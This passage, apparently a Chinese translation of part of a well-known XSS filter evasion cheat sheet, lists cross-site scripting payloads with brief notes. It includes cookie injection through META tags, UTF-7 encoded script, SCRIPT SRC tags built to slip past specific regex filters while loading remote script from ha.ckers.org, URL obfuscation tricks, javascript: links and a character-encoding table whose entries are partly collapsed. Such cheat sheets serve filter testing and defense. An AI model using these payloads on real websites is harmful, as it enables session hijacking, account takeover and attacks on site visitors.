这是公认的不着边际,但是我已经发下一个例子是用 <META 去覆盖cookie。另一个例子是有些网站使用cookie中的某些数据去呈现在当前访问者的网页中为仅仅他自己而不是从远程数据库中获取。当这两个清静联系在一起的时候,你可以通过修改cookie让javascript输入到用户页面中。(你可以借此让用户退出,改变用户的状态,甚至让用户以你的身份登录)
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS‘)</SCRIPT>">
UTF-7编码#
如果存在xss的页面没有包含页面charset header,或是对于任何被设为UTF-7 的浏览器,我们可以利用下面的代码。(感谢Roman Ivanov 的提供),点击这儿为这个例子。(如果页面设置是自动识别编码且content-types 没有被覆盖,在ie浏览器或使用了IE渲染引擎的 Netscape 8.1,则你不需要声明 charset )在没有改变编码的情况下它是不能工作在任何现代浏览器,这也是为什么它被标记为完全不支持。Watchfire发现这个漏洞在Google的 自定义 404 脚本中.
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS‘);+ADw-/SCRIPT+AD4-
使用HTML 引用封装的xss#
它是被测试在ie,具体因情况而异。这个向量是为了绕过那些可以输入 "<SCRIPT>" 但不允许输入 "<SCRIPT SRC...",通过正则"/<script[^>]+src/i"进行过滤的xss过滤器。
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js">
为了执行xss代码在那些允许输入"<SCRIPT>" 但不允许 "<script src..."(通过正则拼配"/<script((\s+\w+(\s=\s(?:"(.)?"|‘(.)?‘|[^‘">\s]+))?)+\s|\s)src/i"来过滤) 这个是重要的,因为我已经看到这个正则在实际环境中被使用。
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
另一个逃避相同正则 "/<script((\s+\w+(\s=\s(?:"(.)?"|‘(.)?‘|[^‘">\s]+))?)+\s|\s)src/i"过滤的xss代码
<SCRIPT a=">" ‘‘ SRC="http://ha.ckers.org/xss.js"></SCRIPT>
再一个xss例子去绕过相同的过滤器,对于"/<script((\s+\w+(\s=\s(?:"(.)?"|‘(.)?‘|[^‘">\s]+))?)+\s|\s)src/i"的正则过滤。我知道,我说过我将不会去痛痛快快的聊减灾技术。但是这是我所看到的唯一例子在允许用户输入<SCRIPT>但是不允许通过src加载远程脚本的过滤器。(当然,还有一些其他方法去处理它,如果它们允许<SCRIPT> )
<SCRIPT "a=‘>‘" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
最后一个绕过"/<script((\s+\w+(\s=\s(?:"(.)?"|‘(.)?‘|[^‘">\s]+))?)+\s|\s)src/i"正则匹配的例子,通过重音符。(无法工作在firfox)
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这个xss例子押注于那些并不去拼配一对引号,而是去发现任何引号后就立即结束一个参数字符串的正则过滤器。
<SCRIPT a=">‘>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这xss仍然让我担心, as it would be nearly impossible to stop this without blocking all active content:
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
URL 字符串绕过#
这里假设 "http://www.google.com/" 这种形式的url在语法上是不被过滤器允许的。
IP代替域名
<A HREF="http://66.102.7.147/">XSS</A>
URL 编码
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
双字节编码 (注意:有其他的双字节编码变种。请参考下面混淆后的ip地址为更多信息)
<A HREF="http://1113982867/">XSS</A>
十六进制编码 The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit,因为十六进制数字在0-f之间,因此第三位开头的0可以被省略掉。
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
八进制编码 Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
混合编码 让我们混合基本各种编码并且插入一个tab和换行符。为什么浏览器允许这样,我是不知道。但是它是可以工作当它们被包含在引号之间。
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
协议绕过 “//”代替“http:// ” 可以节省更多字符。这是非常有用的当输入空间是有限的时候。节省两个字符可能解决大问题。也是容易绕过像"(ht|f)tp(s)?://" 这样的正则过滤。(感谢 Ozh 提出这部分)。你也可以改变"//" 为 "\"。你需要保证斜杠在适当的地方。否则可能会被当作一个相对路径的url。
<A HREF="//www.google.com/">XSS</A>
Google "feeling lucky" I Firefox 使用 Google的"feeling lucky" 函数去重定向用户输入的任何关键字。因此你可以在可利用页面使用各种关键字针对任何Firefox用户进行攻击。它是使用了"keyword:" 协议。你可以使用多个关键字像这样:XSS+RSnake。它是无法使用在 Firefox as of 2.0。
<A HREF="//google">XSS</A>
Google "feeling lucky" II 这是使用一个小技巧让他工作在Firefox,因为只有Firefox实现了 "feeling lucky" 函数。不像下一个例子,这是无法工作在 Opera ,由于 Opera认为它是一种老的钓鱼攻击。其实它只是一个简单的畸形url。如果你点击弹出框的确定按钮它将工作。但是由于这是一个错误对话框,其实我想说Opera是不支持这种形式的。另外它已经不再被支持在 Firefox 2.0。
<A HREF="http://[email protected]">XSS</A>
Google "feeling lucky" III 通过畸形url来工作在Firefox 和 Opera浏览器。因为只有它们实现了 "feeling lucky" 函数。像上面的例子一样,它们需要你的网站在谷歌搜索对应关键字时排名第一。(例如google)
<A HREF="http://google:ha.ckers.org">XSS</A>
移除别名 结合上面的url。移除 "www." 将节省四个字符。
<A HREF="http://google.com/">XSS</A>
绝对 DNS用额外的点
<A HREF="http://www.google.com./">XSS</A>
JavaScript link location
<A HREF="javascript:document.location=‘http://www.google.com/‘">XSS</A>
针对内容替换的攻击向量 这里假设 "http://www.google.com/" 这种链接会被替换为空。我确实有一个去针对特殊文字过滤的简单的攻击向量。这是一个例子去帮助创建向量。(IE: "java script:" 被替换为"java script:", 它是仍可以工作在 IE和使用安全模块的 Netscape 8.1+ 和 Opera)
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
字符编码表#
最后附上 "<" 在html或是javascript中所有可能的编码形式。它们绝大多数是无法正常被渲染的,但是可以在上文中某些情景下得到渲染。
< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C